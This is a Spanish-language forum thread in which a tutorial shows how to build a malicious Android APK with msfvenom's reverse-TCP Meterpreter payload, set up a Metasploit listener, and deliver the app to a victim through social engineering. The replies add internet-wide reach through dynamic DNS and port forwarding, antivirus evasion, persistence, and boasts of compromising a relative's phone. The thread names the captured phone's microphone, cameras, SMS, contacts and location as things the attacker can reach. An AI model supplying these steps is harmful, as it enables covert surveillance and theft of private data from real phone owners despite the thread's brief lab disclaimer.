Como tomar control de un dispositivo Android en menos de 1 minuto

Iniciado por ANTRAX, Mayo 24, 2017, 11:27:24 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

Como es de público conocimiento el sistema operativo Android cubre aproximadamente el 85% del mercado, superando a Apple y Windows Phone. Por eso es tan importante mostrar algunos de los ataques que se pueden realizar para tomar conciencia de la seguridad de los dispositivos y de la información que un usuario expone en sus dispositivos.


Antes que nada, muy buenos días, hoy vamos a tratar un tema muy recurrente de la cual mucha gente cree esta exenta, el ataque a dispositivos Android, voy a tratar de demostrar como con un par de simples líneas de comandos y un poco de ingeniería socia como podemos acceder a un dispositivo Android, recuerden siempre trabajar en un entorno de LABORATORIO

NECESITAMOS:

    1 Máquina Virtual con KALI 2.0 o Backtrack (vamos a usar Metasploit)
    1 Máquina Virtual con Android

EMPECEMOS:

La creación de la máquina virtual con KALI esta explicada en el POST anterior asique eso queda descartado, ahora nos vamos a enfocar en la creación de la máquina virtual con ANDROID que particularmente para mí fue bastante difícil encontrar algo que se parezca lo bastante posible a un dispositivo Android, que además sea fácil y que sea rápido ya que por lo general la virtualización de este tipo de dispositivos consume bastaste recursos.

En este caso voy a utilizar Genymotion es un emulador de Android que aprovecha la arquitectura x86 para ejecutar de forma fluida y rápida distintos dispositivos Android. Olvidando la lentitud del emulador nativo de Android podemos ejecutar todo tipo de aplicaciones y juegos en nuestro Windows, Mac o Linux. Uno de los principales usos de Genymotion es facilitar el desarrollo de aplicaciones Android. Casi más de 900.000 usuarios registrados usan sus máquinas virtuales para crear aplicaciones usando Eclipse o intelliJ. Se integran perfectamente con el adb, línea de comandos y los diferentes entornos de desarrollo. Podemos lanzar en apenas un par de segundos las aplicaciones conectadas al ADT desde el IDE para testearla. Mucho tiempo ahorrado. Genymotion está basado en el uso de máquinas virtuales x86 optimizadas para correr sobre Virtual box. A muchos les sonarán proyectos similares, pero la gente de Genymotion ha conseguido crear una interfaz simple capaz de soportar distintas funcionalidades accesibles a cualquier usuario, sin olvidar a los desarrolladores (su principal target y modelo de negocio).

Acá les dejo el link de donde descargarlo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (aclaración, primero deben crearse un usuario, ya que es requerido para descargar el dispositivo luego).

Una vez descargado Genymotion pueden descargar por versión de Android (actualmente tiene desde la versión 2.3.7 hasta la 5.1.0) o por Dispositivo en donde podrán elegir marcas entre SONY, SAMSUNG, HTC, MOTOROLA, GOOGLE entre otras, cada una de la versiones con distintos requisitos.


Una vez que terminamos de descargar la versión de dispositivo que necesitamos nos queda más o menos así: (en mi caso descargue el modelo Nexus 5 con Android 4.4.4)


Solo les queda hacer click en "Start" para prender la máquina virtual y que se nos vea de la siguiente forma:


Listo! Ya tengo mi Nexus 5 andando y listo para hacer las pruebas que necesite!

Ahora si vamos al KALI a preparar la aplicación maliciosa (Application Package File o ".APK" )

Creamos el archivo malicioso, para eso usamos MSFVENOM desde una terminal:

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI LPORT=Puerto_KALI R > /root/AplicacionMaliciosa.apk


Listo, ya tengo mi APK maliciosa:


Lo próximo es dejar "escuchando" desde KALI hasta que la víctima ejecute la aplicación, para eso abrimos METASPLOIT y lo configuramos de la siguiente manera:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST IP_KALI
set LPORT Puerto_KALI
exploit



Ahora debemos enviar el APK malicioso a nuestra victima usan un poco de Ingeniería Social
y nos queda esperar a que la víctima lo ejecute luego de eso obtendremos lo siguiente:


Android Hackeado!!


Listo!!! Una sesión de Meterpreter conectada hacia nuestra víctima, en este caso se puede ver que el comando "sysinfo" me dice que la víctima tiene un Android 4.4.4

Con el comando HELP podemos ver qué acciones podemos hacer en el dispositivo, muchas de las acciones ya fueron explicadas en POST anteriores, pero las acciones particulares de Android son:

    Grabar con el Micrófono
    Tomar Fotos con ambas cámaras (Frontal y Trasera)
    Hacer Streming desde la cámara seleccionada
    Verificar si el dispositivo es ROOTEADO
    Obtener el listado de llamadas
    Obtener el listado de Contactos
    Obtener los SMS
    Obtener la Ubicación del Dispositivo
    Enviar SMS
    Entre otras más cosas...


¡! ACLARACIÓN !¡: El dispositivo tiene que PERMITIR el uso de aplicaciones de Origen Desconocido.


Autor: Matias


el dispositivo, al que realizaremos el ataque, tiene que ser root?


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
el dispositivo, al que realizaremos el ataque, tiene que ser root?

No necesariamente.

Saludos,
ANTRAX


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
el dispositivo, al que realizaremos el ataque, tiene que ser root?
No creo que sea necesario, ciertas funciones si requieren de root, habria que montar todo en el laboratorio para despehar dudas y comentar nuestras experiencias

Mayo 25, 2017, 12:32:33 PM #5 Ultima modificación: Mayo 25, 2017, 07:05:47 PM por DUDA
Cita de: ANTRAX¡! ACLARACIÓN !¡: El dispositivo tiene que PERMITIR el uso de aplicaciones de Origen Desconocido.

Sabemos que de manera nativa un usuario tiene esta opción deshabilitada, ¿alguien sabe alguna forma de primero lograr permitir esta opción?

Gracias por leer!
DUDA

Antrax, muy bueno el post. Probé esto tiempo atrás y no resultó como esperaba. Hubieron algunos errores, entre ellos estaba, que no funcionó con mi celular Alcatel Pixie Android 6.0.1 (no está rooteado). Después hice el mismo procedimiento con mi celular el LG G2 Android 5.0.1 (rooteado) y funcionó perfectamente.

También me pude percatar que es detectable el APK infectado al antivirus que tenga el celular y hasta con la aplicación "Clean Master" me detecto el APK como archivo malicioso.
... De las piedras y el aire no proviene el concepto de lo que es bueno y lo que es malo, de la no vida no puede surgir vida.

Este método solo funciona en una red local o también puede funcionar en otras redes?

Mayo 25, 2017, 02:33:59 PM #8 Ultima modificación: Mayo 25, 2017, 02:35:50 PM por mfuck
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Este método solo funciona en una red local o también puede funcionar en otras redes?

Sí funciona en Otras. En vez de asignar una IP como atacante, asignas tu dirección no-ip o dyndns... etc.
Debes mapear tus puertos en el router del isp para poder acceder desde la WAN cuando estás Nateando. :D

Lo malo de este método es que las sesiones no perduran en versiones de android 5.0.1 hacia arriba y sin root.
Lo probé el año pasado con un amigo desde una red 3G a 1000km de distancia... y no tenía root, al menos podía enviar sms desde su numero a sus contactos XD
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Generación X

Muy buen aporte :) ! , mi duda es en la prueba como le paso el apk a el emulador ?

Hola... Muy buen post y mas para los que estamos aprendiendo.

Tengo un inconveniente al poner exploit en la metasploit

Handler failed to bind to 192.168.0.100:8080:-  -
  • Started reverse TCP handler on 0.0.0.0:8080
  • Starting the payload handler...

    En que estoy fallas, Gracias si me pueden ayudar

Muy buena PoC, desde luego.
Aunque no sea necesario hacer root (no lo creo) si que el dispositivo tiene que tener habilitada la opcion de instalar software de fuentes no oficiales.

Como hago para descargar imagenes del celular a kali? Se que es el comando download pero como pongo la ruta?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola... Muy buen post y mas para los que estamos aprendiendo.

Tengo un inconveniente al poner exploit en la metasploit

Handler failed to bind to 192.168.0.100:8080:-  -
  • Started reverse TCP handler on 0.0.0.0:8080
  • Starting the payload handler...

    En que estoy fallas, Gracias si me pueden ayudar
No se puede bindear a esa IP, seguramente no es la IP de la máquina. Compruebalo
Código: php
~#ip addr
.

Muchas gracias por el aporte. Gracias a este tipo malware pude hackear el movil de mi familia.

Un saludo. :) :)

De esta manera, casi todos los antivirus que vienen de fabrica con los móviles hoy en día te lo detectan. Existen varias aplicaciones como Shellter o como Apkwash que pueden dificultar su trabajo. Además es recomendable firmarlas.

Gracias por el aporte! Que pasa si se reenicia el celular infectado? se pierde la coneccion ? o la coneccion dura hasta que se desinstale la apk?

Gracias!

Si se reinicia se pierde la conectividad a menos que la persona vuelva a iniciar la apk, lo que se puede hacer es que se deje persistente, y como dice el amigo mas arriba ay que tratar de que la detecten lo menos posible.


Enviado desde mi iPhone utilizando Tapatalk


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Consulta, esto es muy difícil para un novato ?

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No para nada de dificil. No es tremenda ciencia existen mucho video en youtube de lo mismo. es lo que mas hay. y si lees bien y vas paso por paso te daras cuenta que es copiar y pegar lo que dice el tutorial.